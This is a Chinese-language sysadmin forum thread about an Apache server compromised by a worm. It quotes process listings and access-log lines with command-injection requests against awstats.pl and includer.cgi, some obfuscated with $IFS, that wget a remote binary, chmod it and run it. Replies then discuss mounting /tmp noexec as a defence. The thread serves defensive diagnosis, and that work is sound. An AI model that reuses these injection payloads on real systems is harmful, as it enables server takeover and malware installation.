主題: 這是怎麼做到的...用apache wget

[TyroneYeh]

己將 apache 更新為 2.0.55 + openssl 0.9.8a 也會被這樣 ??

代碼: [選擇]


apache    7667  2306  0 13:20 ?        00:00:00 sh -c cd /tmp;wget 24.224.174.18/listen;chmod +x listen;./listen        
apache    7668  7667  0 13:20 ?        00:00:00 wget 24.224.174.18/listen
apache    7671  6289  0 13:20 ?        00:00:00 sh -c cd /tmp;wget 24.224.174.18/listen;chmod +x listen;./listen        
apache    7672  7671  0 13:20 ?        00:00:00 wget 24.224.174.18/listen


[Darkhero]

你有沒有裝 awstats.pl ?....

grep 一下你的 httpd 的 access.log 看看....
像是 grep wget access.log ...
像是我的會出現...

代碼: [選擇]


65.30.76.175 - - [14/Nov/2005:02:40:35 +0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|  HTTP/1.1" 404 374 "-"


但是由於我沒有裝 awstats.pl 所以沒作用....

請參考一下三月份的文章
http://phorum.study-area.org/viewtopic.php?t=29501&highlight=awstat

[Darkhero]

另外....
補充一下....

該漏洞已經被作成蠕蟲了...
所以基本上擴散的很快...

[TyroneYeh]

我沒有裝 awstats 哩!!!

看了一下 Log 還真多奇奇怪怪的東西哩, 但這些我看我的檔案裡都沒有耶

檢查過 httpd.conf 也沒看先有設 cgi-local 的地方. 真奇怪!!!

66.92.235.50 - - [15/Nov/2005:03:50:55 +0800] "GET /scgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bchmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo|  HTTP/1.1" 404 344
66.92.235.50 - - [15/Nov/2005:03:51:27 +0800] "GET /cgi-bin/includer.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 337
66.92.235.50 - - [15/Nov/2005:03:51:31 +0800] "GET /cgi-bin/include/includer.cgi
?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo
$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 345
66.92.235.50 - - [15/Nov/2005:03:51:32 +0800] "GET /scgi-bin/include/includer.cg
i?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`ech
o$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 346
66.92.235.50 - - [15/Nov/2005:03:51:34 +0800] "GET /cgi-bin/inc/includer.cgi?|cd
$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS
\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 341
66.92.235.50 - - [15/Nov/2005:03:51:35 +0800] "GET /scgi-bin/inc/includer.cgi?|c
d$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IF
S\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 342
66.92.235.50 - - [15/Nov/2005:03:51:36 +0800] "GET /cgi-local/includer.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 339

[twu2]

建議把 /tmp mount 成 noexec 吧, 會少很多問題. (應該是說... 執行 apache 的那個 user, 不要讓他有可執行的權限在他可寫的路徑內)

PS. 我家的機器, 好像照這原則做了之後, 就沒發生過類似的情形. (不過.. apache 還是有洞可以寫檔案到 /tmp 下頭, 偶而還是會發現, 只是都執行不起來, 等於沒什麼作用)

[TyroneYeh]

怎麼把 /tmp mount 成 noexec 呢?

[kenduest]

怎麼把 /tmp mount 成 noexec 呢?

切一個分割區給 /tmp 使用，mount 參數傳入 noexec。

或者是使用 tmpfs 來給 /tmp 用也可以。

==

[twu2]

把 /tmp mount 成 noexec, 在某些程式的運作可能會有問題. 碰到時再想辦法去避開.

例如, 在 debian 上頭, 這樣會造成 dpkg (apt) 無法正常運作, 只要在 /etc/apt/apt.conf 中加上下面這一段設定就可以解決.

代碼: [選擇]

Dpkg
  {
      Pre-Invoke { "/bin/mount /tmp -o remount,exec"; };
      Post-Invoke { "/bin/mount /tmp -o remount,noexec"; };
  };



[TyroneYeh]

那不是要把硬碟重新分割耶, 只有一顆硬碟己有作業系統的不就很麻煩
下次要裝新系統就要記得切一個磁區給 tmp 了!!!

[Darkhero]

用 tmpfs 就不用重新分割啦....

http://score.hsjh.tc.edu.tw/plog/index.php?op=ViewArticle&articleId=60&blogId=9

[kenduest]

把 /tmp mount 成 noexec, 在某些程式的運作可能會有問題. 碰到時再想辦法去避開.

例如, 在 debian 上頭, 這樣會造成 dpkg (apt) 無法正常運作, 只要在 /etc/apt/apt.conf 中加上下面這一段設定就可以解決.

其實 crontab 與 logrotate 等程式一般都會在 /tmp 放檔案並執行，所以 /tmp 設定為 noexec 問題其實還不少。

==

[phantom]

其實, 這樣看起來, 把 apache chroot 會不會是比較好的選擇?

[twu2]

有些程式改一下 TMPDIR 到別的路徑就可以解決.
如果程式不支援 TMPDIR, 那就再想別的方法吧.

基本上, 我是認為把 /tmp 設成 noexec 得到的好處會比這些麻煩事還多一些.